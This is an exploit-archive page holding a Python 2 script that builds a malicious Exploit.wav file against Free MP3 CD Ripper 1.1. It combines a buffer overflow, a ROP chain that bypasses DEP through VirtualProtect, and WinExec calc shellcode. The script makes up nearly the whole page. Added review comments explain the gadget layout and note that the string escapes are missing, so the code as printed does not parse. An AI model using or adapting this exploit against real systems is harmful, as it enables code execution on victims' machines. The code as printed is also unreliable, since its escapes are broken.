
# Title : Free MP3 CD Ripper 1.1 DEP Bypass Exploit
# Published : 2011-08-27
# Author :
# Previous Title : Muse Music All-In-One 1.5.0.001 .pls File Buffer Overflow (DEP Bypass)
# Next Title : ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit


#!/usr/bin/python
#
#[+]Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit
#[+]Date: 2782011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html
#[+]Found/Initial Exploit: X-h4ck(http://www.exploit-db.com/exploits/17727/)
#[+]Version: 1.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#

from struct import pack
from time import sleep
import os
from sys import exit

# Python 2 script: uses `print` statements and the `except X, e` form, so it
# will not parse under Python 3.
#
# NOTE(review): throughout this listing the backslash of every string escape
# has been dropped in rendering (`tt` where two tabs were meant, `x90` where a
# byte escape was meant, and unescaped inner quotes in the success message near
# the end). As printed, the code neither parses nor writes the byte values its
# comments describe; all length arithmetic below is on the text as shown.
print '''
 
      		  Created By C4SS!0 G0M3S
     		  E-mail louredo_@hotmail.com
      		  Blog net-fuzzer.blogspot.com
'''
sleep(2)

# Payload written into the output file. The author's comments state it is a
# WinExec "Calc.exe" stub avoiding the bytes 00/0a/0d; that cannot be checked
# from this listing since the escapes are missing (see note above).
shellcode = ("xddxc3xd9x74x24xf4x5bx29xc9xb1x32xb8x08x99" 
"xc4xb4x31x43x17x03x43x17x83xcbx9dx26x41x37" 
"x75x2fxaaxc7x86x50x22x22xb7x42x50x27xeax52" 
"x12x65x07x18x76x9dx9cx6cx5fx92x15xdaxb9x9d" 
"xa6xeax05x71x64x6cxfax8bxb9x4exc3x44xccx8f"  # Shellcode WinExec "Calc.exe"
"x04xb8x3fxddxddxb7x92xf2x6ax85x2exf2xbcx82"  # BadChars "x00x0ax0d"
"x0fx8cxb9x54xfbx26xc3x84x54x3cx8bx3cxdex1a" 
"x2cx3dx33x79x10x74x38x4axe2x87xe8x82x0bxb6" 
"xd4x49x32x77xd9x90x72xbfx02xe7x88xbcxbfxf0" 
"x4axbfx1bx74x4fx67xefx2exabx96x3cxa8x38x94"
"x89xbex67xb8x0cx12x1cxc4x85x95xf3x4dxddxb1" 
"xd7x16x85xd8x4exf2x68xe4x91x5axd4x40xd9x48" 
"x01xf2x80x06xd4x76xbfx6fxd6x88xc0xdfxbfxb9" 
"x4bxb0xb8x45x9exf5x37x0cx83x5fxd0xc9x51xe2" 
"xbdxe9x8fx20xb8x69x3axd8x3fx71x4fxddx04x35" 
"xa3xafx15xd0xc3x1cx15xf1xa7xc3x85x99x27")
#######################ROP START HERE#######################################
# Every gadget and pointer below is a hard-coded absolute address, so the chain
# is tied to the exact module load addresses of the author's test system
# (header says WIN-XP SP3 Brazilian Portuguese, i.e. no ASLR — presumably why
# the title calls it "universal"; confirm before relying on that). The
# VirtualProtect pointer 0x00CA2108 is reused by the call stub at the end of
# buf. Each 4-byte value is packed little-endian ('<L').
rop = pack('<L',0x6f483d9b) # PUSH ESP # POP EBP # RETN
rop += pack('<L',0x004a7252) # XCHG EAX,EBP # RETN
rop += pack('<L',0x0047855b) # XCHG EAX,ECX # RETN
rop += pack('<L',0x00494277) # POP EAX # RETN
rop += pack('<L',0x00CA2108) # PTR to VirtualProtect
rop += pack('<L',0x10007584) # POP EDI # RETN 
rop += pack('<L',0x00493b99) # RETN
rop += pack('<L',0x10013cb1) # POP ESI # RETN
rop += pack('<L',0x00C81C02) # PTR to JMP[EAX]
rop += pack('<L',0x00453cc7) # POP EBP # RETN
rop += pack('<L',0x100081cd) # ADD ESP,24 # RETN // Return of function VirtualProtect
rop += pack('<L',0x00493b98) # POP EBX # RETN
rop += pack('<L',0x000000db) # dwSize value: 0xdb = 219, matching the "219 bytes" in the note below
rop += pack('<L',0x004b0609) # POP EDX # RETN
rop += pack('<L',0x00000040) # flNewProtect value (0x40)
rop += pack('<L',0x004c8dc0) # PUSHAD # RETN 
rop += ("A" * 32)
rop += pack('<L',0x00463BE9) # JMP to Shellcode
#######################ROP END HERE#########################################
#Note:
#Here we have control of 219 bytes of memory, is not a good space. :)
#So our solution would be: call the function VirtualProtect pointing to inicion 4112 bytes of the file. 
#Now that control the 219-byte one, a good space
#to a function call VirtualProtect and its parameter. ;)
############################################################################
# NOTE(review): the author's note above is garbled ("inicion" is presumably
# Portuguese "início", start). The gist appears to be: only 219 bytes are
# controlled at the overflow site, so that space holds just the VirtualProtect
# call and its arguments, while the actual shellcode sits 4112 bytes into the
# file — consistent with the buffer layout that follows. Verify against a
# debugger before treating this as fact.

# Output file layout: 50-byte 0x90 run, shellcode, "A" padding up to offset
# 4112, the ROP chain, then a short hand-assembled stub.
# NOTE(review): no RIFF/WAVE header is written at all — the file is padding and
# payload only, so any consumer that validates the WAV header before trusting
# the rest of the file would reject it outright.
buf = ("x90" * 50)
buf += shellcode
# No length check: if len(buf) were ever greater than 4112 the repeat count
# would be negative and Python silently yields "" instead of an error.
buf += ("A" * (4112-len(buf)))
buf += rop
# Machine-code stub appended after the chain; it calls through the same
# VirtualProtect pointer (0x00CA2108, here as the little-endian bytes
# 08 21 CA 00) used in the ROP section above.
buf += (
"x54" # PUSH ESP
"x6Ax40" # PUSH 40
"x66xB8x50x10" # MOV AX,1050
"x50" # PUSH EAX
"x8BxCC" # MOV ECX,ESP
"x2BxC8" # SUB ECX,EAX
"x8BxD9" # MOV EBX,ECX
"x51" # PUSH ECX
"xFFx15x08x21xCAx00" # CALL DWORD PTR DS:[Kernel32.VirtualProtect]
"xFFxD3") # CALL EBX // Jmp to My Shellcode after call VirtualProtect

print "tt[+]Creating Exploit File..."
sleep(1)
# Writes buf as Exploit.wav in the current working directory. Only IOError is
# handled: the error text is printed and the process exits with status -1.
# The success message below has unescaped inner quotes as rendered, which is a
# syntax error on this page (see the note at the top of the script).
try:
    f = open("Exploit.wav","wb")
    f.write(buf)
    f.close()
    print "tt[+]File "Exploit.wav" Created Succefully."
    sleep(1)
except IOError,e:
    print "tt[+]Error: "+str(e)
    exit(-1)